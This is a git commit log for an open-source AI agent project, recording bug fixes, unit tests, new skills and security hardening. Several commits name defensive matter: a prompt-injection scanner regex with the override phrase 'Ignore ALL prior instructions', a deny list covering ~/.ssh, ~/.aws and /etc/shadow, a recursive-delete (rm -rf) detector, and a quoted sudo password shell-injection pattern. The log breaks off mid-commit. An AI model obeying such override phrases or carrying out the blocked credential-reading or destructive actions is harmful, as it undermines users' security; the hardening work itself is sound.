8b54bb4d89 docs: update CONTRIBUTING.md to enhance contribution guidelines and clarify priorities 2026-02-27 06:37:36 -08:00
kaos35
2595d81733 feat: Add Superpowers software development skills
Add 5 new skills for professional software development workflows,
adapted from the Superpowers project ( obra/superpowers ):

- test-driven-development: RED-GREEN-REFACTOR cycle enforcement
- systematic-debugging: 4-phase root cause investigation
- subagent-driven-development: Structured delegation with two-stage review
- writing-plans: Comprehensive implementation planning
- requesting-code-review: Systematic code review process

These skills provide structured development workflows that transform
Hermes from a general assistant into a professional software engineer
with defined processes for quality assurance.

Skills are organized under software-development category and follow
Hermes skill format with proper frontmatter, examples, and integration
guidance with existing skills.
2026-02-27 15:32:58 +01:00
FurkanL0
f9e05218ca Create SKILL.md 2026-02-27 17:07:13 +03:00
FurkanL0
2ddda5da89 Create DESCRIPTION.md 2026-02-27 17:06:17 +03:00
Teknium
dc80f0b222 Merge pull request #117 from Bartok9/docs/add-contributing-guide
docs: add CONTRIBUTING.md with contributor guidelines
2026-02-27 05:22:31 -08:00
teknium1
5007a122b2 fix(terminal): enhance error logging in cleanup functions with exception info 2026-02-27 03:53:58 -08:00
Teknium
43f2321225 Merge pull request #91 from 0xbyt4/fix/cli-spinner-flickering
fix(cli): reduce spinner flickering under patch_stdout
2026-02-27 03:48:32 -08:00
Teknium
1362f92f2e Merge pull request #89 from 0xbyt4/fix/cli-show-config-wrong-path
fix(cli): show correct config file path in /config command
2026-02-27 03:48:13 -08:00
teknium1
445d2646a9 Enhance arXiv integration: Add BibTeX generation, ID versioning, and withdrawn paper handling. Update search script to display version information alongside arXiv IDs. 2026-02-27 03:45:59 -08:00
Teknium
ae8d25faca Merge pull request #87 from 0xbyt4/fix/cli-max-turns-sentinel
fix(cli): respect explicit --max-turns value even when it equals default
2026-02-27 03:42:18 -08:00
Teknium
9061c03b6d Merge pull request #84 from 0xbyt4/fix/cli-paste-detection-false-positive
fix(cli): prevent paste detection from destroying multi-line input
2026-02-27 03:40:13 -08:00
Teknium
8174f5a988 Merge pull request #83 from 0xbyt4/fix/cli-save-config-string-model
fix(cli): prevent crash in save_config_value when model is a string
2026-02-27 03:36:39 -08:00
teknium1
03f7b551be Update README.md: Add DeepWiki Docs badge and enhance security description for sandboxing feature 2026-02-27 03:27:17 -08:00
Teknium
80ad6572a3 Merge pull request #75 from satelerd/fix/whatsapp-multi-user-sessions
fix(whatsapp): multi-user session isolation and bridge message handling
2026-02-27 03:25:54 -08:00
teknium1
c77f3da0ce Cherry-pick 6 bug fixes from PR #76 and update documentation
Code fixes (run_agent.py):
- Fix off-by-one in _flush_messages_to_session_db skipping one message per flush
- Add clear_interrupt() to 3 early-return paths preventing stale interrupt state
- Wrap handle_function_call in try/except so tool crashes don't kill the conversation
- Replace fragile `is` identity check with _flush_sentinel marker for memory flush cleanup
- Fix retry loop off-by-one (6 attempts not 7)
- Remove redundant inline `import re`
2026-02-27 03:21:49 -08:00
teknium1
c104647450 Documentation (README.md):
- Add "Security Hardening" section with table of protections from recent PRs
- Add "Reasoning Effort" config section under Features
- Add Slack and WhatsApp env vars to Environment Variables Reference
- Remove non-functional ANTHROPIC_API_KEY from env vars table
- Add `hermes whatsapp` to Commands section

Documentation (docs/messaging.md):
- Rewrite WhatsApp section to reflect Baileys bridge and `hermes whatsapp` flow
- Add Slack env vars, adapter to architecture diagram, and platform toolsets table
2026-02-27 03:21:42 -08:00
Teknium
547ba73b82 Merge pull request #65 from leonsgithub/fix/sudo-password-shell-injection
fix(security): prevent shell injection in sudo password piping
2026-02-27 01:50:07 -08:00
Teknium
3526fa27fd Merge pull request #62 from 0xbyt4/test/expand-coverage-2
test: add unit tests for 8 modules (batch 2)
2026-02-27 01:47:30 -08:00
Teknium
9eabdb64ff Merge pull request #72 from cutepawss/fix/install-script-silent-abort
fix: prevent silent abort in piped install when interactive prompts fail (#69)
2026-02-27 01:45:06 -08:00
Teknium
6f543eac9f Merge branch 'main' into fix/install-script-silent-abort 2026-02-27 01:44:59 -08:00
Teknium
64eca85876 Merge pull request #67 from 0xbyt4/test/add-run-agent-unit-tests
test: add unit tests for run_agent.py (AIAgent)
2026-02-27 01:36:49 -08:00
Teknium
152271851f Merge pull request #63 from 0xbyt4/fix/cron-prompt-injection-bypass
fix: cron prompt injection scanner bypass for multi-word variants
2026-02-27 01:34:14 -08:00
Teknium
0909be3aa8 Merge pull request #61 from 0xbyt4/fix/write-deny-macos-symlink
fix: resolve symlink bypass in write deny list on macOS
2026-02-27 01:32:19 -08:00
Teknium
274e623b50 Merge pull request #60 from 0xbyt4/test/expand-coverage
test: add unit tests for 8 untested core modules
2026-02-27 01:30:36 -08:00
Teknium
2972f982e4 Merge pull request #55 from bierlingm/fix/atexit-signal-handler-race
Fix SystemExit traceback during atexit cleanup on Ctrl+C
2026-02-27 00:42:23 -08:00
Bartok Moltbot
df8a62d018 test(tools): add unit tests for clarify_tool.py
Add comprehensive test coverage for the clarify_tool module:

- TestClarifyToolBasics: 5 tests for core functionality
  - Simple questions, questions with choices, error handling

- TestClarifyToolChoicesValidation: 5 tests for choices parameter
  - MAX_CHOICES enforcement, empty/whitespace handling, type conversion

- TestClarifyToolCallbackHandling: 3 tests for callback behavior
  - Exception handling, question/response trimming

- TestCheckClarifyRequirements: 1 test verifying always-true behavior

- TestClarifySchema: 6 tests verifying OpenAI function schema
  - Required/optional parameters, maxItems constraint

Total: 20 tests covering all public functions and edge cases.
2026-02-27 03:29:26 -05:00
teknium1
fec5d59fb3 feat(gateway): integrate pairing store and event hook system
This update introduces a pairing store for code-based user authorization and an event hook system within the GatewayRunner class. These enhancements aim to improve user authorization processes and facilitate event-driven functionalities in the gateway.
2026-02-27 00:23:26 -08:00
Bartok9
7285e44064 docs: add CONTRIBUTING.md with contributor guidelines
Add comprehensive contributor guide covering:
- Development setup
- Project structure overview
- Code style guidelines
- How to add new tools
- How to add new skills
- Pull request process
- Commit message conventions
- Security considerations
2026-02-27 03:23:04 -05:00
teknium1
2ff54ae6b3 fix(gateway): Remove session_db from AIAgent instantiation to prevent errors
This change removes the session_db parameter from AIAgent instantiations in gateway/run.py, addressing issues related to session management. The previous implementation caused errors when session_db was not properly initialized, leading to failures in session_search functionality.
2026-02-27 00:13:47 -08:00
Teknium
f74ac0fc3a Merge pull request #108 from Bartok9/fix-session-db-gateway
fix(gateway): Pass session_db to AIAgent, fixing session_search error
2026-02-27 00:11:18 -08:00
teknium1
26a6da27fa feat(research): add arXiv search skill and documentation
- Introduced a new skill for searching and retrieving academic papers from arXiv using their REST API, allowing searches by keyword, author, category, or ID.
- Added a helper script for clean output of search results, including options for sorting and filtering.
- Created a DESCRIPTION.md file outlining the purpose and functionality of the research skills.
2026-02-27 00:05:06 -08:00
teknium1
19abbfff96 feat(ocr-and-documents): add OCR and document extraction skills
- Introduced new skills for extracting text from PDFs, scanned documents, and images using OCR and document parsing tools.
- Added detailed documentation for usage and installation of `pymupdf` and `marker-pdf` for local extraction.
- Implemented scripts for text extraction with both lightweight and high-quality options, including support for various document formats.
- Updated web extraction functionality to handle PDF URLs directly, enhancing usability for academic papers and documents.
2026-02-26 23:06:08 -08:00
Bartok Moltbot
8aa531c7fa fix(gateway): Pass session_db to AIAgent, fixing session_search error
When running via the gateway (e.g. Telegram), the session_search tool
returned: {"error": "session_search must be handled by the agent loop"}

Root cause:
- gateway/run.py creates AIAgent without passing session_db=
- self._session_db is None in the agent instance
- The dispatch condition "elif function_name == 'session_search' and self._session_db"
  skips when _session_db is None, falling through to the generic error

This fix:
1. Initializes self._session_db in GatewayRunner.__init__()
2. Passes session_db to all AIAgent instantiations in gateway/run.py
3. Adds defensive fallback in run_agent.py to return a clear error when
   session_db is unavailable, instead of falling through

Fixes #105
2026-02-27 00:32:17 -05:00
Teknium
21cf339a85 Merge pull request #59 from deankerr/fix/ssh-terminal-check
fix: add SSH backend to terminal requirements check
2026-02-26 21:22:47 -08:00
teknium1
588cdacd49 feat(session): implement session reset policy for messaging platforms
- Added configuration options for automatic session resets based on inactivity or daily boundaries in cli-config.yaml.
- Enhanced SessionResetPolicy class to support a "none" mode for no auto-resets.
- Implemented memory flushing before session resets in SessionStore to preserve important information.
- Updated setup wizard to guide users in configuring session reset preferences.
2026-02-26 21:20:50 -08:00
teknium1
0cce536fb2 fix: fileops on mac
Co-authored-by: Dean Kerr <dean.kerr@gmail.com>
2026-02-26 21:20:25 -08:00
teknium1
b281ecd50a Fix: rending issue on /skills command 2026-02-26 20:29:52 -08:00
teknium1
b267e34092 feat(cli): add auto-restart functionality for hermes-gateway service when updating
- Implemented a check to determine if the hermes-gateway service is active after an update.
- Added logic to automatically restart the service if it is running, ensuring changes are applied without manual intervention.
- Updated user guidance to reflect the new auto-restart feature, removing the need for manual restart instructions.
2026-02-26 20:26:05 -08:00
teknium1
58fce0a37b feat(api): implement dynamic max tokens handling for various providers
- Added _max_tokens_param method in AIAgent to return appropriate max tokens parameter based on the provider (OpenAI vs. others).
- Updated API calls in AIAgent to utilize the new max tokens handling.
- Introduced auxiliary_max_tokens_param function in auxiliary_client for consistent max tokens management across auxiliary clients.
- Refactored multiple tools to use auxiliary_max_tokens_param for improved compatibility with different models and providers.
2026-02-26 20:23:56 -08:00
teknium1
f0458ebdb8 feat(config): enhance terminal environment variable management
- Updated .env.example to clarify terminal backend configuration and its relationship with config.yaml.
- Modified gateway/run.py to ensure terminal settings from config.yaml take precedence over .env, improving consistency in environment variable handling.
- Added mapping for terminal configuration options to corresponding environment variables for better integration.
2026-02-26 20:05:35 -08:00
teknium1
0a231c0783 feat(config): synchronize terminal settings with environment variables
- Added functionality to keep the .env file in sync with terminal configuration settings in config.yaml, ensuring terminal_tool can directly access necessary environment variables.
- Updated setup wizard to save selected backend and associated Docker image to .env for improved consistency and usability.
2026-02-26 20:02:46 -08:00
teknium1
7c1f90045e docs: update README and tools configuration for improved toolset management
- Updated README to reflect the new command for configuring tools per platform.
- Modified tools_config.py to correct the handling of preselected entries in the toolset checklist, ensuring proper functionality during user interaction.
2026-02-26 19:59:24 -08:00
teknium1
a5ea272936 refactor: streamline API key retrieval in transcription and TTS tools
- Removed fallback to OPENAI_API_KEY in favor of exclusively using VOICE_TOOLS_OPENAI_KEY for improved clarity and consistency.
- Updated environment variable checks to ensure only VOICE_TOOLS_OPENAI_KEY is considered, enhancing error handling and messaging.
2026-02-26 19:56:42 -08:00
teknium1
715825eac3 fix(cli): enhance provider configuration check for environment variables
- Updated the logic in _has_any_provider_configured to include OPENAI_BASE_URL as a valid provider variable, allowing local models to be recognized without an API key.
- Consolidated environment variable checks into a single tuple for better maintainability.
2026-02-26 19:56:24 -08:00
cesareth
1a97e82000 feat(cli): add /verbose slash command to toggle debug output at runtime
Closes #77. Users can now type /verbose in the CLI to toggle verbose
mode on or off without restarting. When enabled, full tool call
parameters, results, and debug logs are shown. The agent's
verbose_logging and quiet_mode flags are updated live, and Python
logging levels are reconfigured accordingly.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-26 23:18:45 +00:00
Erosika
70d1abf81b refactor: run Honcho and USER.md in tandem
USER.md stays in system prompt when Honcho is active -- prefetch is
additive context, not a replacement. Memory tool user observations
write to both USER.md (local) and Honcho (cross-session) simultaneously.
2026-02-26 18:07:33 -05:00
Erosika
1fd0fcddb2 feat: integrate Honcho with USER.md memory system
When Honcho is active:
- System prompt uses Honcho prefetch instead of USER.md
- memory tool target=user add routes to Honcho
- MEMORY.md untouched in all cases

When disabled, everything works as before.

Also wires up contextTokens config to cap prefetch size.
2026-02-26 18:07:17 -05:00
Erosika
ab4bbf2fb2 feat: add Honcho AI-native memory integration
Opt-in persistent cross-session user modeling via Honcho. Reads
~/.honcho/config.json as single source of truth (shared with
Claude Code, Cursor, and other Honcho-enabled tools). Zero impact
when disabled or unconfigured.

- honcho_integration/ package (client, session manager, peer resolution)
- Host-based config resolution matching claude-honcho/cursor-honcho pattern
- Prefetch user context into system prompt per conversation turn
- Sync user/assistant messages to Honcho after each exchange
- query_user_context tool for mid-conversation dialectic reasoning
- Gated activation: requires ~/.honcho/config.json with enabled=true
2026-02-26 18:07:17 -05:00
teknium1
669e4d0297 add experimental google workspace command center skill 2026-02-26 14:29:51 -08:00
0xbyt4
f92875bc3e fix(cli): reduce spinner flickering under patch_stdout
KawaiiSpinner used a two-phase clear+redraw approach: first write
\r + spaces to blank the line, then \r + new frame. When running
inside prompt_toolkit's patch_stdout proxy, each phase could trigger
a separate repaint, causing visible flickering every 120ms.

Replace with a single \r\033[K (carriage return + ANSI erase-to-EOL)
write so the line is cleared and redrawn atomically.
2026-02-26 23:55:07 +03:00
0xbyt4
7f36259f88 fix(cli): show correct config file path in /config command
show_config() always checked cli-config.yaml in the project directory,
but load_cli_config() first looks at ~/.hermes/config.yaml. When the
user config existed, /config would display "cli-config.yaml (not found)"
even though configuration was loaded successfully from ~/.hermes/.

Use the same lookup order as load_cli_config and display the actual
resolved path.
2026-02-26 23:49:08 +03:00
0xbyt4
2c28d9f560 fix(cli): respect explicit --max-turns value even when it equals default
max_turns used 60 as both the default and the sentinel to detect
whether the user passed the flag. This meant `--max-turns 60` was
indistinguishable from "not passed", so the env var
HERMES_MAX_ITERATIONS would silently override the explicit CLI value.

Change the default to None so any user-supplied value takes priority.
2026-02-26 23:43:38 +03:00
0xbyt4
c21b071e77 fix(cli): prevent paste detection from destroying multi-line input
The _on_text_changed handler collapsed buffer contents into a file
reference whenever the buffer had 5+ newlines, regardless of how
those lines were entered. This meant manually typing with Alt+Enter
would trigger the paste heuristic and silently replace the user's
carefully typed input.

Track the previous buffer length and only treat a change as a paste
when more than one character is added at once (real pastes insert many
characters in a single event, while typing adds one at a time).
2026-02-26 23:40:38 +03:00
0xbyt4
de197bd7cb fix(cli): prevent crash in save_config_value when model is a string
load_cli_config() supports both string and dict formats for the model
key (e.g. `model: "anthropic/claude-opus-4"`), but save_config_value()
assumed all intermediate keys are dicts. When the config file used the
string format, running `/model <name>` would crash with TypeError:
'str' object does not support item assignment.

Add an isinstance check so non-dict values are replaced with a fresh
dict before descending.
2026-02-26 23:35:00 +03:00
teknium1
bf9dd83c10 fix(cli): improve description extraction for toolsets
- Updated the description extraction logic to split on ". " (period+space) to avoid breaking on abbreviations like "e.g." or version numbers.
- Changed the method to prioritize the first line of the description, ensuring more relevant information is captured for display.
2026-02-26 12:11:32 -08:00
teknium1
760fb2ca0e feat(install): enhance installation script for build tools and interactive prompts
- Updated the installation script to check for necessary build tools on Debian/Ubuntu systems and prompt the user to install them if missing.
- Improved user interaction by redirecting input from /dev/tty for prompts, ensuring compatibility when the script is piped from curl.
- Added checks to verify the successful installation of the main package and provide guidance if installation fails.
- Enhanced the handling of shell configuration files to ensure ~/.local/bin is added to PATH for various shell types.
2026-02-26 11:37:40 -08:00
Teknium
a8ccaca8ea Merge pull request #68 from cutepawss/fix/dangerous-cmd-regex-false-positive
fix: prevent false positives in recursive delete detection
2026-02-26 11:32:06 -08:00
George Pickett
32070e6bc0 Merge remote-tracking branch 'origin/main' into codex/align-codex-provider-conventions-mainrepo
# Conflicts:
#	cron/scheduler.py
#	gateway/run.py
#	tools/delegate_tool.py
2026-02-26 10:56:29 -08:00
Daniel Sateler
f02f647237 fix(whatsapp): per-contact DM session isolation and user identity in context 2026-02-26 12:44:09 -03:00
Daniel Sateler
96043a8f7e fix(whatsapp): skip agent's own replies in bridge message handler 2026-02-26 12:43:24 -03:00
darya
0bb8d8faf5 fix: prevent silent abort in piped install when interactive prompts fail (#69)
Root cause: the install script uses `set -e` (exit on error) and `read -p`
for interactive prompts. When running via `curl | bash`, stdin is a pipe
(not a terminal), so `read -p` hits EOF and returns exit code 1. Under
`set -e`, this silently aborts the entire script before hermes is installed.

Fix: detect non-interactive mode using `[ -t 0 ]` (standard POSIX test for
terminal stdin) and skip all interactive prompts when running in piped mode.
Clear messages are shown instead, telling the user what to run manually.

Changes:
- Add IS_INTERACTIVE flag at script start ([ -t 0 ] check)
- Guard sudo package install prompt (the direct cause of #69)
- Guard setup wizard (calls interactive hermes setup)
- Guard WhatsApp pairing and gateway install prompts

All other prompts use the same read -p pattern and would fail the same way
in piped mode, so they are all guarded for completeness.

Closes #69
2026-02-26 17:45:50 +03:00
darya
f5c09a3aba test: add regression tests for recursive delete false positive fix
Add 15 new tests in two classes:

- TestRmFalsePositiveFix (8 tests): verify filenames starting with 'r'
  (readme.txt, requirements.txt, report.csv, etc.) are NOT falsely
  flagged as 'recursive delete'

- TestRmRecursiveFlagVariants (7 tests): verify all recursive delete
  flag styles (-r, -rf, -rfv, -fr, -irf, --recursive, sudo rm -rf)
  are still correctly caught

All 29 tests pass (14 existing + 15 new).
2026-02-26 16:40:44 +03:00
darya
3227cc65d1 fix: prevent false positives in recursive delete detection
The regex pattern for detecting recursive delete commands (rm -r, rm -rf,
etc.) incorrectly matched filenames starting with 'r' — e.g., 'rm readme.txt'
was flagged as 'recursive delete' because the dash-flag group was optional.

Fix: make the dash mandatory so only actual flags (-r, -rf, -rfv, -fr)
are matched. This eliminates false approval prompts for innocent commands
like 'rm readme.txt', 'rm requirements.txt', 'rm report.csv', etc.

Before: \brm\s+(-[^\s]*)?r  — matches 'rm readme.txt' (false positive)
After:  \brm\s+-[^\s]*r     — requires '-' prefix, no false positives
2026-02-26 16:32:01 +03:00
0xbyt4
90ca2ae16b test: add unit tests for run_agent.py (AIAgent)
71 tests covering pure functions, state/structure methods, and
conversation loop pieces. OpenAI client and tool loading are mocked.
2026-02-26 16:15:04 +03:00
Leon
25e260bb3a fix(security): prevent shell injection in sudo password piping
The sudo password was embedded in shell commands via single-quote
interpolation: echo '{password}' | sudo -S

If the password contained shell metacharacters (single quotes,
$(), backticks), they would be interpreted by the shell, enabling
arbitrary command execution.

Fix: use shlex.quote() which properly escapes all shell-special
characters, ensuring the password is always treated as a literal
string argument to echo.
2026-02-26 19:04:32 +07:00
0xbyt4
feea8332d6 fix: cron prompt injection scanner bypass for multi-word variants
The regex `ignore\s+(previous|all|above|prior)\s+instructions` only
allowed ONE word between "ignore" and "instructions". Multi-word
variants like "Ignore ALL prior instructions" bypassed the scanner
because "ALL" matched the alternation but then `\s+instructions`
failed to match "prior".

Fix: use `(?:\w+\s+)*` groups to allow optional extra words before
and after the keyword alternation.
2026-02-26 13:55:54 +03:00
0xbyt4
ffbdd7fcce test: add unit tests for 8 modules (batch 2)
Cover model_tools, toolset_distributions, context_compressor,
prompt_caching, cronjob_tools, session_search, process_registry,
and cron/scheduler with 127 new test cases.
2026-02-26 13:54:20 +03:00
0xbyt4
b699cf8c48 test: remove /etc platform-conditional tests from file_operations
These tests documented the macOS symlink bypass bug with
platform-conditional assertions. The fix and proper regression
tests are in PR #61 (tests/tools/test_write_deny.py), so remove
them here to avoid ordering conflicts between the two PRs.
2026-02-26 13:43:30 +03:00
0xbyt4
2efd9bbac4 fix: resolve symlink bypass in write deny list on macOS
On macOS, /etc is a symlink to /private/etc. The _is_write_denied()
function resolves the input path with os.path.realpath() but the deny
list entries were stored as literal strings ("/etc/shadow"). This meant
the resolved path "/private/etc/shadow" never matched, allowing writes
to sensitive system files on macOS.

Fix: Apply os.path.realpath() to deny list entries at module load time
so both sides of the comparison use resolved paths.

Adds 19 regression tests in tests/tools/test_write_deny.py.
2026-02-26 13:30:55 +03:00
0xbyt4
0ac3af8776 test: add unit tests for 8 untested modules
Add comprehensive test coverage for:
- cron/jobs.py: schedule parsing, job CRUD, due-job detection (34 tests)
- tools/memory_tool.py: security scanning, MemoryStore ops, dispatcher (32 tests)
- toolsets.py: resolution, validation, composition, cycle detection (19 tests)
- tools/file_operations.py: write deny list, result dataclasses, helpers (37 tests)
- agent/prompt_builder.py: context scanning, truncation, skills index (24 tests)
- agent/model_metadata.py: token estimation, context lengths (16 tests)
- hermes_state.py: SessionDB SQLite CRUD, FTS5 search, export, prune (28 tests)

Total: 210 new tests, all passing (380 total suite).
2026-02-26 13:27:58 +03:00
Dean Kerr
fed9f06c4e fix: add SSH backend to terminal requirements check
The SSH backend was missing from check_terminal_requirements(), causing
it to fall through to `return False`. This silently disabled both the
terminal and file tools when TERMINAL_ENV=ssh was configured.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 20:41:59 +11:00
teknium1
240f33a06f feat(docker): add support check for Docker's --storage-opt option
- Introduced a static method to verify if the Docker storage driver supports the --storage-opt size= option.
- Enhanced resource argument handling in DockerEnvironment to conditionally include storage options based on the support check.
- Added caching for the support check result to optimize performance across instances.
2026-02-26 01:15:56 -08:00
Moritz Bierling
254aafb265 Fix SystemExit traceback during atexit cleanup on Ctrl+C
The browser_tool signal handler calls sys.exit(130) which raises
SystemExit. When this fires during terminal_tool's atexit cleanup
(specifically during _cleanup_thread.join()), it produces an unhandled
traceback. Wrapping the join in a try/except suppresses the race
without changing shutdown behavior.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
2026-02-26 10:13:31 +01:00
teknium1
8bd82119be docs: update README with security details and environment variable descriptions
- Added a section on security, detailing the minimal environment for child processes and the handling of API keys and credentials.
- Included new environment variables: `LLM_MODEL` for default model name and `HERMES_HOME` for overriding the config directory.
2026-02-26 01:12:57 -08:00
Teknium
9a148bb9a3 Merge pull request #51 from deankerr/fix/cli-env-path-resolution
fix: consistent HERMES_HOME and .env path resolution across all entry points
2026-02-26 01:09:02 -08:00
teknium1
7a4241e406 Co-authored-by: Dogila Developer <valeshera11@gmail.com> 2026-02-26 01:04:47 -08:00
teknium1
cb92fbe749 feat: add Notion block types reference documentation
- Introduced a new markdown file detailing various Notion block types for API usage, including examples for creating and reading blocks.
- Covered block types such as paragraphs, headings, lists, to-dos, quotes, callouts, code, toggles, dividers, bookmarks, images, and more.
- Provided structured JSON examples for each block type to assist developers in implementation.
2026-02-26 01:03:27 -08:00
Teknium
1d04074464 Merge pull request #53 from JoshuaMart/fix/install
fix(install): create ~/.hermes before moving Node.js directory
2026-02-26 00:58:34 -08:00
Teknium
c4096b4731 Merge pull request #27 from VolodymyrBg/fix/tool-context-docstring-threading
fix: align threading docstring with implementation
2026-02-26 00:56:49 -08:00
teknium1
178658bf9f test: enhance session source tests and add validation for chat types
- Renamed test method for clarity and added comprehensive tests for `SessionSource` including handling of numeric `chat_id`, missing optional fields, and invalid platforms.
- Introduced tests for session source descriptions based on chat types and names, ensuring accurate representation in prompts.
- Improved file tools tests by validating schema structures, ensuring no duplicate model IDs, and enhancing error handling in file operations.
2026-02-26 00:53:57 -08:00
teknium1
d372eb1f0e feat: add uv.lock file for package management
- Introduced a new `uv.lock` file to manage package dependencies and versions.
- Included details for packages such as `aiohappyeyeballs` and `aiohttp`, specifying their versions, sources, and available wheels.
- Set Python version requirements and resolution markers to ensure compatibility.
2026-02-26 00:53:50 -08:00
Joshua MARTINELLE
ebe25fefd6 Add missing mkdir 2026-02-26 09:39:11 +01:00
Joshua MARTINELLE
688ccf05cb Format 2026-02-26 09:38:51 +01:00
Dean Kerr
9dc5615b9d fix: use HERMES_HOME constant in doctor.py directory check
Line 184 hardcoded Path.home() / ".hermes" instead of using the
existing HERMES_HOME variable which already respects the env var.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 19:20:30 +11:00
Dean Kerr
696e2316a8 fix: respect HERMES_HOME and add encoding fallback in rl_cli.py
Consistent with other entry points: use _hermes_home from HERMES_HOME
env var, and add UTF-8 → latin-1 encoding fallback on load_dotenv.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 19:01:13 +11:00
Dean Kerr
f2891b70d0 fix: respect HERMES_HOME env var in gateway and cron scheduler
Both entry points hardcoded Path.home() / ".hermes" for .env, config.yaml,
logs, and lock files. Now uses _hermes_home which reads HERMES_HOME env var
with ~/.hermes as default, matching cli.py and run_agent.py.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 18:51:46 +11:00
Teknium
dcf370cb6e Merge pull request #34 from 0xbyt4/test/reorganize-and-add-unit-tests
test: reorganize test structure and add missing unit tests
2026-02-25 23:49:34 -08:00
teknium1
1b8eb85eeb Add npm audit checks for Node.js packages in doctor.py
- Implemented functionality to run `npm audit` for specified Node.js package directories.
- Added checks for vulnerabilities, reporting critical, high, and moderate issues.
- Enhanced user feedback based on audit results, guiding users on necessary actions for vulnerabilities.
2026-02-25 23:47:39 -08:00
Dean Kerr
cf3236ed27 fix: resolve .env path from ~/.hermes/ in cli.py, matching run_agent.py pattern
Load ~/.hermes/.env first with project root as dev fallback, and remove
redundant second load_dotenv call inside load_cli_config(). Also sets
MSWEA_GLOBAL_CONFIG_DIR so mini-swe-agent shares the same config.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 18:37:20 +11:00
teknium1
6c86c7c4a9 Add output format examples for YouTube content
- Introduced a new markdown file detailing various output formats including chapters, summaries, Twitter threads, blog posts, and quotes.
- Each section provides structured examples to guide content creators in presenting their video material effectively.
2026-02-25 23:28:16 -08:00
teknium1
9cc2cf3241 Add youtube transcript collection skill:
Co-authored-by: UfukNode <ufuk@crivacy.io>
2026-02-25 23:28:09 -08:00
teknium1
9eb4a4a481 fix: gateway credential resolution, memory flush auth, and LLM_MODEL fallback
- Custom endpoint (OPENAI_API_KEY/OPENAI_BASE_URL) now works in gateway and cron
- Memory flush on /reset passes credentials to temp agent
- LLM_MODEL env var fallback matches CLI priority chain
- Obsidian skill: replace hardcoded paths with OBSIDIAN_VAULT_PATH env var
- Setup wizard: strip emojis from TerminalMenu to fix macOS rendering
- execute_code: allowlist-filter child process environment variables

Co-authored-by: VencentSoliman <4spacetuna@gmail.com>
2026-02-25 23:20:57 -08:00
Teknium
8463b7ea59 Merge pull request #46 from rsavitt/fix/docker-backend-macos
Fix Docker backend on macOS and subagent auth for Nous Portal
2026-02-25 23:17:25 -08:00
Teknium
faa185e37c Merge branch 'main' into fix/docker-backend-macos 2026-02-25 23:14:57 -08:00
Teknium
53b3177ca5 Merge pull request #48 from deankerr/fix/config-path-resolution
fix: resolve .env and config paths from ~/.hermes/, not project root
2026-02-25 23:11:30 -08:00
teknium1
76badfed63 Enhance CLI documentation and functionality for session resumption
- Updated README and CLI documentation to include new commands for resuming sessions: `--continue` for the most recent session and `--resume <id>` for specific sessions.
- Added examples in the CLI help output and detailed instructions on resuming sessions in the documentation.
- Improved user experience by automatically displaying the resume command upon exiting a session.
2026-02-25 23:04:08 -08:00
teknium1
3c1e31de3e Implement session continuation feature in CLI
- Added a new command-line argument `--continue` to allow users to resume the most recent CLI session easily.
- Introduced a helper function to retrieve the last session ID from the database.
- Updated command handling to integrate the new session continuation functionality.
2026-02-25 23:00:10 -08:00
teknium1
d2c932d3ac add session resumption for cli with easy copy paste command 2026-02-25 22:56:12 -08:00
Dean Kerr
5a569eb1b6 fix: resolve .env and config paths from HERMES_HOME, not PROJECT_ROOT
The `hermes` CLI entry point (hermes_cli/main.py) and the agent runner
(run_agent.py) only loaded .env from the project installation directory.
After the standard installer, code lives at ~/.hermes/hermes-agent/ but
config lives at ~/.hermes/ — so the .env was never found.

Aligns these entry points with the pattern already used by gateway/run.py
and rl_cli.py: load ~/.hermes/.env first, fall back to project root .env
for dev-mode compatibility.

Also fixes:
- status.py checking .env existence and API keys at PROJECT_ROOT
- doctor.py KeyError on tool availability (missing_vars vs env_vars)
- doctor.py checking logs/ and Skills Hub at PROJECT_ROOT instead of HERMES_HOME
- doctor.py redundant logs/ check (already covered by subdirectory loop)
- mini-swe-agent loading config from platformdirs default instead of ~/.hermes/

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 16:49:14 +11:00
teknium1
e5bd25c73f Fix: #41 2026-02-25 21:16:15 -08:00
teknium1
eb88474dd8 fix: strip emoji characters from menu labels in TerminalMenu
- Added regex to remove emoji characters from menu items to prevent visual issues on macOS, ensuring proper display and functionality.
2026-02-25 21:13:35 -08:00
teknium1
9fc0ca0a72 add full support for whatsapp 2026-02-25 21:04:36 -08:00
Raeli Savitt
95b6bd5df6 Harden agent attack surface: scan writes to memory, skills, cron, and context files
The security scanner (skills_guard.py) was only wired into the hub install path.
All other write paths to persistent state — skills created by the agent, memory
entries, cron prompts, and context files — bypassed it entirely. This closes
those gaps:

- file_operations: deny-list blocks writes to ~/.ssh, ~/.aws, ~/.hermes/.env, etc.
- code_execution_tool: filter secret env vars from sandbox child process
- skill_manager_tool: wire scan_skill() into create/edit/patch/write_file with rollback
- skills_guard: add "agent-created" trust level (same policy as community)
- memory_tool: scan content for injection/exfil before system prompt injection
- prompt_builder: scan AGENTS.md, .cursorrules, SOUL.md for prompt injection
- cronjob_tools: scan cron prompts for critical threats before scheduling

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 23:43:15 -05:00
teknium1
f1311ad3de refactor: update Obsidian vault path handling
- Changed the hardcoded vault path to be set via the OBSIDIAN_VAULT_PATH environment variable, with a default fallback.
- Updated all relevant commands to utilize the new variable for reading, listing, searching, creating, and appending notes, improving flexibility and usability.
2026-02-25 20:24:51 -08:00
Raeli Savitt
0310170869 Fix subagent auth: propagate parent API key to child agents
When using Nous Portal (or any non-OpenRouter provider), child agents
spawned by delegate_task failed with "No pricing available" or "Unknown
model" errors because they had no valid API key.

The delegate tool passed base_url but not api_key to child AIAgent
instances. Without an explicit key, children fell back to the empty
OPENROUTER_API_KEY env var, causing auth failures.

Extract the parent's API key from _client_kwargs and pass it through.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 22:37:36 -05:00
Raeli Savitt
b6d7e222c1 Fix Docker backend failures on macOS
Three issues prevented the Docker terminal backend from working:

